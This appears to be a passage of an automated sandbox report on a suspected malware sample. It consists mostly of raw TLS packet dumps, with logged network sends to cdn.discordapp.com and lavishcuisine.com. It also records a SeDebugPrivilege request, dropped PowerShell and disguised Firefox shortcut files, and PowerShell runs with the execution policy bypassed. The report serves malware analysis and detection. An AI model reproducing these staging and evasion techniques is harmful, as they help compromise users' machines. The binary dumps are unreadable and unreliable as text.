Data received î ëI0‚E0‚- ŠöX9O÷ÔÀ:D# 0  *†H†÷  0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20 210119000000Z 220118235959Z0m1 0 UUS1 0 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0‚"0  *†H†÷ ‚0‚ ‚¬Cb„Ÿ6Q‹;“Ž Ó㐳Á@k-ŸÓÕ»ÀÓQbÕËÿ~ôxÚkJ»” ©pn˜˜VŸM6ìZ:r¨ùÑàÇoéÏÿ®1ÏH{«èæ}ºfXŽ\͍O.íäT/Æ› q‹d€³Q‡_žˆ˜Õ ;$xÛFq´C‹W¤8-Mi–$²sÊý‡ä³¢a.ÁÁk³#ùs·5ƒüy 8^¶löeý§”„”„:Û§µnZ"À¢5Cq¿mÓßôòýž'ø.°ì·ßö_%¼PZT—ºšÄpµ7¿ƒÞ:€–ü,}–DZ_.Mõl!ñYÊ2™}J¯£‚0‚þ0U#0€©ü²EIÁo04+هœ°%Wz0U8åôÎh §ëf?ߊþ5²ÄÇ×0BU;09‚*.discordapp.com‚sni.cloudflaressl.com‚discordapp.com0Uÿ 0U%0++0{Ut0r07 5 3†1http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 5 3†1http://crl4.digicert.com/CloudflareIncRSACA-2.crl0>U 70503g 0)0'+http://www.digicert.com/CPS0v+j0h0$+0†http://ocsp.digicert.com0@+0†4http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0 Uÿ00‚ +Öyõòðv)y¾ðž99!ðVsŸc¥wå¾W}œ` øùM]&\%]DŽwp®ûG0E!哦v£}–*¦Â¿¦þ‹.¤š>@T–g†.Ý{ (Aè—V<'ûǼŽz°ú5"eÈ{L(`?` üë,/Ev"EEYU$V–?¡/ñ÷m†à#&c­ÀK]ƃ\nâwp¯QG0E Ò6W\î ãhj9ô}x‚aè^‹<›?T¨|$%îÞ!ºÝl—šR:nn†ãóý?®ª¡ÜGRÚ¯x!™ù10  *†H†÷  ‚€»ÿ-2߃)_/¼Xˆ"Kùo¬ó?I÷|¬eB)Ìҗõ|ðïÙ2AK˜BŸÓtxsž¶9WÜbÙÝWªiñÜËلAARâY¿´þ^Àûڏ«²ÀpQHÝ7ø¤HXëê="„¬›*Ô!beɂ¼lÝ‡§L+û­#— ýHñ´{©YkM[œäÈT‰WgÁ(q®_ô ƒ°y0èàßj²Qw@µu¸­71ÓYE‡º–:¹V¶Iª§~-øPíì•d05ÌR Ì_yCq^ÌÁ£ƒfš…tšœÆ¼¼è¼|u+•uN¹Xœ~8?ÑÙHOlKBŸ¿|žW2ôýa–×é–œ0‚˜0‚€ ؚsó³¸Ú[X8˜)0  *†H†÷  0Z1 0 UIE10U  Baltimore10U  CyberTrust1"0 UBaltimore CyberTrust Root0 200127124639Z 241231235959Z0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20‚"0  *†H†÷ ‚0‚ ‚µ]&È «±3] ²–Â1N~_‡Æo€$íÚ®¾ç€÷ÅÏTf8(èæi»ø1jVõèÁ¥èYè³à:a(°~Í ýÎ7Ã驍 Éxʦ`F€¯t-OÚè RțZ2Ï!!G\ŠªÀp±ñÞß-…©•ì[W99¾…Âï׶,J?ÑÖ³!¢—O%,B#}׳Öi…¯ÕªØhd㭝R/Ååô‘¯å ًFçÏ2"ð7Äý‹æâÌ:Hׁa‚¿=rÙp^ì i$â<HãþÓåQÔ+À¡O“p™¿·Òƒni-ÈÍ¢bLC7_:v“Zúni]šÅˆÁ£‚h0‚d0U©ü²EIÁo04+هœ°%Wz0U#0€åY0‚GX̬úT6†{:µMð0Uÿ†0U%0++0Uÿ0ÿ04+(0&0$+0†http://ocsp.digicert.com0:U3010/ - +†)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `†H†ýl0*0(+https://www.digicert.com/CPS0  `†H†ýl0g 0g 0g 0  *†H†÷  ‚|°Ž¦dráaÝót=P§çÂN &+Açð°óòÒçP€ÒÆ©º“ë¾ÁÁ†øO„¼|ær/é¶ÆviÝòjGk“T¤ €5'݊ŸÈ„—Ó´àÚ¦ðçÏ杘”ÒËÚ"wØI ¨UŽ‰ÔÒÎÐèÚàBýÎ~–„ʧÑ'Ÿ)¼ÿí.4ýF*ïNV|èÜ"—íS [º{àòO¥Y•Aͳr.\ozJC+"ËÔ? |óú|ÛJsqéÕÝF¶ž€q™ßõP~3Ò5u$^˜Z¨’Eô´Øˆ¦±déûùeHö–ÞF~Z0S]4âòñ‹•ð”ø­ã“
Data received K
Data received GAëÞ@U¡ëjT1€m‰à/Jg\œ¼qµŒÔ“'BÎY(0i¯º»SÝŸXšÃÃ=vHàŽyG~NœªL†lý8.qƒ¸äœÀÑM‡ÉšTÿöÉU5DöŸwî¼e_yÃÔ³*É.z‰‡|C=ŒQ€XG˜êXvÐÿX54%¢¿7Ú'·$TØà-ߑ6 À+XLûÝù\/îéÄ d…úÑ ”ýð„Zzœ0÷Ù£f©æjDؼ<æQ¥tÆ*;PºùoOôîÛï¯i.˜\ÓFo¨Å°#¶»3ßgš˜Œ('™þü=‚ô¿¿3¥ \`Ñ_S É/ÉÁï3â@R&Á¡\(q2YI‰|­Nc‰ÂGgªÝijj3GK®BÈ:wßdÓل?x±Wˑ)ÞÝôÀ›•¨â9üü
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ÇðòÞPµ%H{WT˜PÉÃ3íš3öâ¹t®’3eç‡4”{—øÀG–쥘…Eµ
Data received p
Data received Y»>5ÀðsÛ¨¨rÃÅÙÎIú.…>µ»Š-虾ÒÚñ‰uʎêSÎá{ ”\1•ËXpf‚$œ©Z&’þB=¸÷ÉwËú”*÷Τ+Ø[–¶ƒÄ\¦Œä§V6xŒß¢*ó‡çWÎʲ´aS«–ýý›ÊªŸp”7¢¾ÜÉd$$O#˜0Û»Ïâfƒ}dV6jªíýÝƍBXA‚8ñàë`Úç}Ó#c‹P‡—­sÀ*g®À{ë»$âŠ7M…|<èž%³Ñà~Ùí®àYϯ°²a”JéFaâÃ[QùBfʉéæW¤AÕ\¶yEãø²ó3\涒y‡ôø:”$`¦vv&àÊ.͹ V‘ W ~$ª24þÓ¬Ú­Aη1ú&Êt&¶ÖŸ,/¯ҀU‚n'ˆIÏÜÓÇÇݵ˜­N¹!VOî³ûHO»^s†'†É<å– m][rÛÖ®‰:„[ÖÁíäA›ïpx2?³Góá½Kÿ`ñDöК䣾 í!FèˆÀ¦w4ÄÍóQ÷É/ÍMüáßüßÄùÀ1Uúç ·+«$nŽ.ƒ;]6Çnc;›>?ªîqì%¾ ]‘΁% 4‡ñ£‚M€T: V…«ºì÷d͸e`|ø¤À¡æ =¤™·‰Jן™(üxØ벑µ®ˆ-£Qª>ם´<åö€©>ŸrsI_äгá²ä¡ûcݸ€”‚8›É³Èn¿×í6ÛîÄöÉy2rlÍÐr#¤±6FW¥ÒHI”5 M`áîŒÁ8<ÂYA` fη€|ðU:uXó•æ¾¦ )އÒyzØÉÝ}ì͑ëag#/+ˆt,ÏeêpŽV¸‡Ä«’ƒ£íS Ô\âÙ<­ÀWÜEMóT™'ça€¨ÿq–å»1A¿|¢–4|͟8€ýR ¹½=„üˆF˜¯•¦ε»<Yó&ݚ”`‰ó#$ÖRX±~v¹öD]_ö{½åÃ<;L¿™ò}ßu%綥EÖv…2grÃOØ Æ*eæ ú‰º»ÚØG_²”¹<\d_…3+ùlöìg,ð9 ¼'¾Nƒ 3ìtp êúy^™Å»?ªiñ3çºb¤«€*óM3Kêø /ÆüãS¸öÅ;æŒÈ_V,SäxDŒ¢×¬ž³ OEÁjd¶$~Kâ¶õ§@ô’c…PlÙ줏 ƒf~ ˜Ÿ“‚uŸÍ`‚JÛÃ#L‹@j!úa z¼‡£.S˜ý7èÿ²­SÀàl`׈j ÍÓ·±w`sM«I¦dÍèWZ£mƲ2bѵDë³ÑÏý”õ þ:ö̌[úhÐtˆ¯¾ƒpí[«Šlw E×LÁð™N ±;ãs7P­éa=—m™|ZIÛæ¸J]³Â"âðCðffÏÚ ¦8U ˜Ýר6WÛ9ÉCápù²–©ÛJÿ.Ö-Þʲ…bæQ$ ΢ý3…x ]ç6¬(Ñ ¸¹Ž·WX呃 ‚Žm ;³ì"o¼̕‡r±‡KËçÁ÷/p!À&ýåÝ6Â&i&n¡ÎQːÎ~iÿ!0  ¸Ó„åY¼Ó#µ!És&¶2d!doÄ°×ÃF=¯Í³ië Þe¾Mk6Þ#|~Ñé²0L\øÔt³€P+ë4½ ìÐ?úBPc¶äZ·‚|»f‘‚J>fT¡Ø~† <ù…‚ØjÕÝ"Ž¬ø]©jr*¾%G]0rUŽMƺé@\´ÄTdÁLp.C8>Ú?'Åz=ªAc=ŸgB„þBµá„6Xÿ6€Ù,9 ß:
Data received °Î}$‹1%ߝýʸšI#É·Œt-^œ"ŸŽ¾áT¯LE$‰‰´äé<ü·“öh£ö6³WE¡“ƒ^¦Öf¬;t`%4cŒ‚Á¶òãÜ \€ð¢(cÎ)6Uü®µÿ# aé9š«´Ê3 ¸QêÁ’׃ÈͶۢ†\ô^­Ä!Á†80á”Õ4œá”Ö³~S6‘…ÚE{ŒÜ‡r=’îÂ|%ßhB¾–uôÄô¸šDd h¼Jvøˆ 8JóÔfµ.O³¬ÜÊ÷ŽµN÷u]ªßWÑ聪o9ÑEä,LM„!ËRɇÍu·ÔIì¢d ß Ò›¿=\m®XaNv=;ë¨z‰)£Eõz¦Ö­žJ„þ®$wó¶ý©;—OøàÙA0hØ÷B\%ß€X±f£ßß4™ þVj*FÇÙ­gPMuöšDÓ n¤r¹ølúÓZ¶²øM=D·ª~ƒò£Mz>ýæZ¬aϼ~UP;éTÂhHšXv ütQÃå»v6­f’„‰s1>ˆ;"!*"*ëîQÏL2|ïM²·"@ Pá[å‡ ãÍ8bIøÎea:w ­cN©åŅ+DºØl1Dä‚ó`N"ô‹Õ[¶¹6"áΏƒÁÙsx‰q=“~¦/£±ò)ÃÔñªmރÖF=ÁžÂ?Dd%pô×Wžïƒ4 ÊyõÔ*[´s³Fî,˜(ïŠßÖÇ|;^;Ž•2šeï—Îe∰Ô½B,`àŒÖ¦E;ymù•:3"ß   à û‘’Ù™&ICS»»úI2!^#´¿ÊgëY¿¢—D#‰š|ä«1ü".ÿ„¥JGIäM0Û²ûSå NԔ -À1 ⽂?úhžÄ.Érº›ªÎ¾ŒAr¿ÖoNŠ!- `9Ðc¾Ð†T¸í#h$ Œ(ì}Ž˜j½ÚT“Fôr¸ø›Ê|LKµ[óØ9§ÿ’ßÐËòÔeŒWVô§jå9¡ ùȁ${•êQ}<gù]„#¨+?7¶Hý_K¿¨î²´!;‰-ÊSÇ,ŽqƒäÒ­³+Ú¦0å·Á`®ó­Ø*mÉyÜEø»­Ú3Ô7³ØƒT¬ß¨$üÃT=›¼ª5æâ†mÔ`”ŒíýRÕõ6ƒD­1Üt$fǤbï¹ø¦0_€ØՏ—ƒžý?›’¤¯•Hl<Uɱ;Ñ^W+ªûDµ}&‡€úÄÁÒ¹Åîû‘¿ˆè™$B¡1_gé£ÒØ؆g‹¹ï’:µS„/O³¸iYø4ê‘¡šàœyé}ù¾Œ€D4öƒýÃàxã=•¯r¹¶zB;œ.ßT:#Õ^¨€>ë7±Àõw ­v´ï vŒ'u˜õòÚS ÈÖ±‡ FÑ Þ¬Øû¨p­äádò–¿}Ö˦ÚÑy„N †”Í%ö3èÑy(¶stú köÔ0ž¶{#¤UKºÈóW0×ÅzŠ|ÝãïQóöéÈ+ H@Þy€‰nÃË#¹þNNÊóÞ*)6r܉]È3wW¼È0åþ ՖEOåÛÑm¶øcsÚüÉ ºêÇó7B—ÁѼÅײÛ×9Uq§C"cÕ'^ntwxW–“sÜ£u§EJ®òΫ7àĄ.¥–Ν>u)òñž·aþ&ÌoƉUJY®VÏÈ©¢•¡ük²´9h’jgTpkŸ®¯ÿÆf“Á^èŠÑ¦¹­,‡¤ƒüŒ öH×eG(±å±çpº‚œ+‡ f”¨‚Ú”C$OVz˜ºObj ¢óÔËúAχ
Data received €
Data received ”6lÕúĪöb=v `4IΙý–2þ‚ Ðk­é*j dé; Ÿ€b¾–nª¸ÛË@²Se°¼(Fþ¹K I´­)šÇÃǐWâ'¾,{>_Ò¸ît΋R%üéDâæÖrñ—»JT{rП2¥Ì‡(ٗö͟vwû»lL®¡
Data received ®6ԂŠ÷Ä`ϒÑ-ÄïÕlÓÛꃕ8oplxFd«B5rÞÁäÁ[B•Îñú¢Ø»nX~ñgmK’¸=ø-,óx»ÆêRÕ¨uÒÿ+Ùé…UpGºgõ7•BßT,8xß œ"JMÁi:H ~UTÿ…ÈåŽû„_êôý•gwKB9ƶuý¯_3”W[o-,¦A«È¼Tf¸œ8#H¶º"8ÁìBpéÜ7ÅÚoœ†2Èâ0±Ñ:’Ÿnçp©ç }©Ô;þw8¢v~ Fžß3Pkœ:ü]]ÅçYžÔÁCß~@áH×gŽØPñÙpM+è†ÙöŸF¥¤vtÚIú›Èm=ƯHH/±uP ¤6O­í‹|óÙ5-öŸ žÐbiáÞ·\e¡¡¿™~)£e"šû5Y(¡4Ø\ [›­¯ÃÃÀ¾bš`½.½Äx¿eé{¹CúËã+ÄÏ7v h‰:fÍ2&£Â;ìü@ö ÓÑ9Á¹‹4¯éè™í®u¡Ïa–õk+¯€}eû0-'"a¹ï븷cD< cM_.Å¢xU¿ å©öúªCþí5È°ÎӍð åõX×~?8‘½~:aQ9ýUÖ>=>FǑ0"ø&ƒ°N|t¿˜0ÿC}zÝõ­øëE „7~AR®œL ~eVHǽsΠ°}ÈÉ%œïdºëdÿiµrµ¨çЪðéŠcÂ>®°}áBøt’ñÛ瓛òҍ¾UÀµD³OÒz¹ó©¨l0“7IaX:@Wƒ|!¿‘áf mšnä“ö»îՀ£à¥LƒÃY¿å̹<à?÷mçgë2“€]4Lú0-”žò°Æfôî"ÕTÇ\µÆZ²*öâ3dž|~Õ$íã"m¿æ«|Uw«G³͆\çÊzK¤`÷«”Øeö0#͋›{qÆð¤ý©wuJh Ã2v¿§G ½TQÖg.Àñ²£KrG™t¥tÐ4 эС=ö`ñhŽ×Û»mÀÐéÔÑŸ÷eÌ]Uœ-å #׃ârf€‚¡¢Ëú; Jåô±Â߅ð`ÐMµéʞï…iS{§6k &o¯RÀ˜yÁùlé›±EÎþ¸1¶¯!d%¶3ÜÏÁFëzyLá9“¶ù(ØlEɋ´¢Cƒ*Î&;0Mß[J •–¦cvDÃn÷½Y ¡¸@îòK7¢Ð¹¿Di¯®ƒõ¶gÄò£_|£wÿÿìAœ”=)ô*%4'syS¥Œ0mukޟƒVÏþ᫯?é<KEb efÐ02Bå3=‡–ÚKUï!{^÷e,X*UÙ­EƒçÒ³WO÷|v'ƒ­=d?º8E·2›·¦éߦ•KcAczØü RõÛ\BmÖ\™L¹ËÚ?ØC¯Ã©J&áô„›‹övû¤Þiœã! Ic~€<8¥kÖ{ñü=Ûû_Q¨ÏöÕeR:ˆôÌÚLÖü ÿ¶ªä±ÖÀ6÷®h)&ܒn­3¡t×%R \ ˆßDvîkdùzìÕà1RpD_éáײŒ;Ǚcž¹!K hCa[Uè1M3ÛÀêDá߁‹¼£“5CIQ,OÏê™Á·ÐYF"„õ‰nœš –ž,Ÿ)*>2Ù°³?‰RekÂp¦›lƾ3^§Që]÷‰4…ö}v. ÀÆæ•F* _OÕ'yè@ŠÜƒ.dv=Ù§FNòÙ¢jF‰!•ô*/ž¹Ù§¤ÅFô=@Í¼å5õÔЇž[ «YŒµÀ¿_oý
Data received @
Data received ®Ä'ÂÐ+ô0—ÄK×¥Þ5añžÄ±Å\›[¦hžl©È@—esUAê=u “Ù*Ìz–Ë0·¦¶À¶À’ׯɰYuœƳÖÌUrìP%—§ÈÔH¢Ú‡@©ñ¤Ð%t,+”²œR Ưïác s™°ê&÷_Ú9Í1D)¬–¿}Í=∃©*BS©Ý±ZGDÉ®0ÖY¦¯‹Ø´/"× ”ˆÎ)É/p" ‚ÅÅücVGèøÏÐYLG~”„ üÌϸ5¶¶@cÎÕ=d/ fó:ÊS‹Ã¯g ˜u8k®'îØÞy×c’¡˜n|ü¨qUåYÆã¥ß´!©ž<p7ŒË0ñ½ub1;X'1çÍà|Õðûæ0’ CÒ»ä¹ ‡gŽŠ¦>¤óB„zx“0Ïß
Data received 
Data received F
Data sent uq`´HtèZ¡KÛ"t³Þ½ÄÞbžRM­! ׶ æ2†,ÿ/5 ÀÀÀ À 280ÿcdn.discordapp.com  
Data sent FBAïºËmÞ|C{n[ä^/×=ž†6=¦Ù¦%³-š¡Åõ€N+ˆR%ï¹¾1Ò@ÆȚg"x!……¡œÍ->0fкÎYÊ<Žufæ³¥Jb-$)¿¤Ií”ë¡XÍËëùøø@IÓª 8½—Œþ
Data sent  cË¡3)íU\÷îjƒîx\ƒG®ò«±±ÅÕ²â`³3Éç(^ĖF¬têg„¤S„¦:D…%[ѕíšªÿHMµ?Nô¨huKeMá¹ñó…„+”7ø……•¬mMBŠNò2:7Œà'§çjZt'ÿ֞PD‡”9dÒü*›ý‰žtË Ýüo¤ó¿LÏå8Ì ~IO| Åù
Data sent €Geš­ŸáìùŽv-ƒzô·´ 6è[I…7ô aÎV4}až0‹G•ú÷Í_Rt»]š’´’ïŠaPÙ+žÇYÝäVn£²IÈ̟¯6mŠÐ4ŠdÈæÚ/Êî¿ÓñG^ìÌ!€QN@C7lØ:_›f-¡F8xbÇvb^ûù*¦P
Data sent tp`´Ht`Í·½µR΃ՄË $ô‘_vJHláï-k†/5 ÀÀÀ À 28/ÿlavishcuisine.com  
Data sent tp`´HtÌ82ëºñš<ìZ½ÂíJ% kÊ«¶Ø{¿ÎÑx/5 ÀÀÀ À 28/ÿlavishcuisine.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
file C:\Users\Public\msynci.ps1
file C:\ProgramData\Microsoft Arts\Start\firefox.lnk
Time & API Arguments Status Return Repeated

send

 buffer: uq`´HtèZ¡KÛ"t³Þ½ÄÞbžRM­! ׶ æ2†,ÿ/5 ÀÀÀ À 280ÿcdn.discordapp.com  
socket: 1544
sent: 122
1 122 0

send

 buffer: FBAïºËmÞ|C{n[ä^/×=ž†6=¦Ù¦%³-š¡Åõ€N+ˆR%ï¹¾1Ò@ÆȚg"x!……¡œÍ->0fкÎYÊ<Žufæ³¥Jb-$)¿¤Ií”ë¡XÍËëùøø@IÓª 8½—Œþ
socket: 1544
sent: 134
1 134 0

send

 buffer:  cË¡3)íU\÷îjƒîx\ƒG®ò«±±ÅÕ²â`³3Éç(^ĖF¬têg„¤S„¦:D…%[ѕíšªÿHMµ?Nô¨huKeMá¹ñó…„+”7ø……•¬mMBŠNò2:7Œà'§çjZt'ÿ֞PD‡”9dÒü*›ý‰žtË Ýüo¤ó¿LÏå8Ì ~IO| Åù
socket: 1544
sent: 165
1 165 0

send

 buffer: €Geš­ŸáìùŽv-ƒzô·´ 6è[I…7ô aÎV4}až0‹G•ú÷Í_Rt»]š’´’ïŠaPÙ+žÇYÝäVn£²IÈ̟¯6mŠÐ4ŠdÈæÚ/Êî¿ÓñG^ìÌ!€QN@C7lØ:_›f-¡F8xbÇvb^ûù*¦P
socket: 1544
sent: 133
1 133 0

send

 buffer: tp`´Ht`Í·½µR΃ՄË $ô‘_vJHláï-k†/5 ÀÀÀ À 28/ÿlavishcuisine.com  
socket: 2028
sent: 121
1 121 0

send

 buffer: tp`´HtÌ82ëºñš<ìZ½ÂíJ% kÊ«¶Ø{¿ÎÑx/5 ÀÀÀ À 28/ÿlavishcuisine.com  
socket: 2028
sent: 121
1 121 0
parent_process powershell.exe martian_process "C:\Users\Public\firefox.bat"
parent_process powershell.exe martian_process C:\ProgramData\Microsoft Arts\Start\firefox.lnk
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy